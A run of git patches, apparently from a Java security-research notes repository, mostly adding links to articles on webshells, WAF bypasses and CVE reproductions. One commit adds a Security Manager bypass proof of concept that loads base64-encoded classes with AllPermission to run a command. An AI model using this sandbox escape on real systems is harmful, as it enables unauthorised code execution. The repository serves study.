From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 10:17:05 +0800 Subject: [PATCH 142/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 41c4596..0bc0205 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -25,3 +25,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) ++ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** From 5e0164f00de0a38b9bcca1d1d0aea0259c7fe62c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 10:18:03 +0800 Subject: [PATCH 143/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3625db3..368e047 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -172,3 +172,4 @@ + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) ++ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 6d147dde23625d4cd2330f05326625ab242f269a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 21:30:19 +0800 Subject: [PATCH 144/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 368e047..d01111e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -173,3 +173,4 @@ + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) From 85590784b125ec6df20b93a445346f87a5bd2f78 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 10 Oct 2022 17:01:17 +0800 Subject: [PATCH 145/332] Create BypassOfCreateClassLoader.java --- BypassSM/BypassOfCreateClassLoader.java | 54 +++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 BypassSM/BypassOfCreateClassLoader.java diff --git a/BypassSM/BypassOfCreateClassLoader.java b/BypassSM/BypassOfCreateClassLoader.java new file mode 100644 index 0000000..21ec80e --- /dev/null +++ b/BypassSM/BypassOfCreateClassLoader.java 
@@ -0,0 +1,54 @@ +package com.evil; + +import java.security.*; +import java.security.cert.Certificate; + +public class MyPoc { + //-Djava.security.manager -Djava.security.policy==bypass-by-createclassloader.policy + static { + try { + Exp(); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void Exp() throws Exception{ + BypassClassLoader0 bypassClassLoader = new BypassClassLoader0(); + Class aClass0 = bypassClassLoader.get(base64Decode("yv66vgAAADQAHwoABgAWBwAXCgACABYKABgAGQcAGgcAGwEADElubmVyQ2xhc3NlcwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALTGV2aWxDbGFzczsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOZXZpbENsYXNzLmphdmEMAAgACQEAC2V2aWxDbGFzcyQxBwAcDAAdAB4BAAlldmlsQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAeamF2YS9zZWN1cml0eS9BY2Nlc3NDb250cm9sbGVyAQAMZG9Qcml2aWxlZ2VkAQA0KExqYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb247KUxqYXZhL2xhbmcvT2JqZWN0OwAhAAUABgAAAAAAAwABAAgACQABAAoAAAAvAAEAAQAAAAUqtwABsQAAAAIACwAAAAYAAQAAAAQADAAAAAwAAQAAAAUADQAOAAAACQAPABAAAQAKAAAAKwAAAAEAAAABsQAAAAIACwAAAAYAAQAAABUADAAAAAwAAQAAAAEAEQASAAAACAATAAkAAQAKAAAAKAACAAAAAAAMuwACWbcAA7gABFexAAAAAQALAAAACgACAAAABgALABEAAgAUAAAAAgAVAAcAAAAKAAEAAgAAAAAACA=="), "evilClass"); + 
bypassClassLoader.get(base64Decode("yv66vgAAADQALQoACAAcCgAdAB4IAB8KAB0AIAcAIQoABQAiBwAjBwAkBwAlAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAxJbm5lckNsYXNzZXMBAA1MZXZpbENsYXNzJDE7AQADcnVuAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAR2YXIyAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAIQEAClNvdXJjZUZpbGUBAA5ldmlsQ2xhc3MuamF2YQEAD0VuY2xvc2luZ01ldGhvZAcAJgwACgALBwAnDAAoACkBAARjYWxjDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAsAAsBAAtldmlsQ2xhc3MkMQEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb24BAAlldmlsQ2xhc3MBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlADAABwAIAAEACQAAAAIAAAAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAGAA4AAAAMAAEAAAAFAA8AEQAAAAEAEgATAAEADAAAAGoAAgACAAAAErgAAhIDtgAEVwGwTCu2AAYBsAABAAAACgALAAUAAwANAAAAFgAFAAAACQAJAAoACwALAAwADAAQAA0ADgAAABYAAgAMAAYAFAAVAAEAAAASAA8AEQAAABYAAAAGAAFLBwAXAAMAGAAAAAIAGQAaAAAABAAbAAAAEAAAAAoAAQAHAAAAAAAI"), "evilClass$1"); + Class.forName(aClass0.getName(), true, bypassClassLoader); + } + + public static byte[] base64Decode(String bs) throws Exception { + Class base64; + byte[] value = null; + try { + base64 = Class.forName("java.util.Base64"); + Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); + value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e) { + try { + base64 = Class.forName("sun.misc.BASE64Decoder"); + Object decoder = base64.newInstance(); + value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e2) { + } + } + return value; + } + + public static class BypassClassLoader0 extends ClassLoader{ + public Class get(byte[] b,String name) { + PermissionCollection pc = new Permissions(); + pc.add(new AllPermission()); + 
//设置ProtectionDomain + ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null); + return super.defineClass(name, b, 0, b.length,pd); + } + } + + public static void main(String[] args) { + + } +} From 6217236b2173ab841592262c9afb274e370edcea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 11 Oct 2022 23:44:18 +0800 Subject: [PATCH 146/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d01111e..47eaea1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -174,3 +174,4 @@ + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) ++ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** From 496002a3fd1a6b269809251196271e9a5f6aac66 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 12 Oct 2022 14:32:12 +0800 Subject: [PATCH 147/332] Create Readme.md --- Jdk/dnsrebinding/Readme.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 Jdk/dnsrebinding/Readme.md diff --git a/Jdk/dnsrebinding/Readme.md b/Jdk/dnsrebinding/Readme.md new file mode 100644 index 0000000..cf62f1a --- /dev/null +++ b/Jdk/dnsrebinding/Readme.md 
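Review bot: `BypassSM/BypassOfCreateClassLoader.java` passes two base64-encoded class files (`evilClass` and `evilClass$1`) to `defineClass` without their source, so nobody reading the change can see what runs once the class is initialized, and the `bypass-by-createclassloader.policy` file named in the JVM-flags comment is not part of this one-file commit. Commit the source of both classes and the policy file next to this file, with a comment stating which permission the policy grants. Also, `public class MyPoc` does not match the file name, and the empty `catch (Exception e2) { }` in `base64Decode` lets it return `null`, which then fails at `b.length` in `get`.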
@@ -0,0 +1,13 @@ +# java rebinding + +http://www.loongten.com/2020/02/26/dns-rebinding-bypass + +http://www.lpnote.com/2018/11/23/java-dns-cache/ + +https://www.xmanblog.net/java-dns-rebinding-ssrf/ + +https://paper.seebug.org/390/ + +https://powerdns.org/hello-dns/ + +http://www.ruanyifeng.com/blog/2016/06/dns.html From 795475bb6737abce9f7fed6aca3a9e8df3f135d8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 14 Oct 2022 20:46:01 +0800 Subject: [PATCH 148/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 47eaea1..98eec1b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -175,3 +175,4 @@ + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** ++ 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** From b6f2ec66e83eb4a1d835b789d55e48c6feb4948b Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Oct 2022 22:01:26 +0800 Subject: [PATCH 149/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 98eec1b..9267955 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -176,3 +176,4 @@ + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** ++ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** From cb24f175dd69d6140d74e1e42ae29b2850ef0bab Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Oct 2022 23:27:10 +0800 Subject: [PATCH 150/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9267955..cb7da58 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -177,3 +177,4 @@ + 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** ++ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) From c22255f37bd0f93746997bc51c0308ea2a2aa4f4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 16 Oct 2022 12:43:47 +0800 Subject: [PATCH 151/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cb7da58..81a54e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -178,3 +178,4 @@ + 2022/10/14 [【技术原创】Java利用技巧——AntSword-JSP-Template的优化](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247552091&idx=1&sn=061377d83ca103c5d0ddbe36e914d2e8&chksm=e915dc61de6255770aee47e7bdf1d50bc6814a99def28b64ed63164faa547c08e28f7c1864c9&mpshare=1&scene=23&srcid=10145tBlCMybIMqBL3KthNAx&sharer_sharetime=1665748971719&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可能之后有用** + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) ++ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** From 5b3bed1865a4acf8e139ed2934bdd08040b3f441 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 16 Oct 2022 23:10:53 +0800 Subject: [PATCH 152/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 81a54e9..39d0e80 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -179,3 +179,4 @@ + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** ++ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** From 20024f762022224471ecffd354624da5a4388f78 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 11:16:23 +0800 Subject: [PATCH 153/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 39d0e80..074b9c9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -180,3 +180,4 @@ + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** ++ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) From 2abd8cb5c6a37f7c80f5dad4e7ab771793ae6074 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 12:31:25 +0800 Subject: [PATCH 154/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 074b9c9..21508c7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -181,3 +181,4 @@ + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) ++ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) From b483a9f6d46bdb6f357d7f9cf9b1020650a2e69a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 22:56:42 +0800 Subject: [PATCH 155/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 21508c7..c4dd358 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -182,3 +182,4 @@ + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) ++ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From dbcc50a340f6532597a77a1ceb166baf99483320 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Oct 2022 00:01:36 +0800 Subject: [PATCH 156/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c4dd358..26584c0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -183,3 +183,4 @@ + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) From 614fade87eda619c49519b38ca8a18ef3fc09fc7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Oct 2022 08:37:53 +0800 Subject: [PATCH 157/332] Update README.md --- tomcat/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/tomcat/README.md b/tomcat/README.md index 1747bb3..c38371f 100644 --- a/tomcat/README.md +++ b/tomcat/README.md @@ -3,3 +3,6 @@ Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 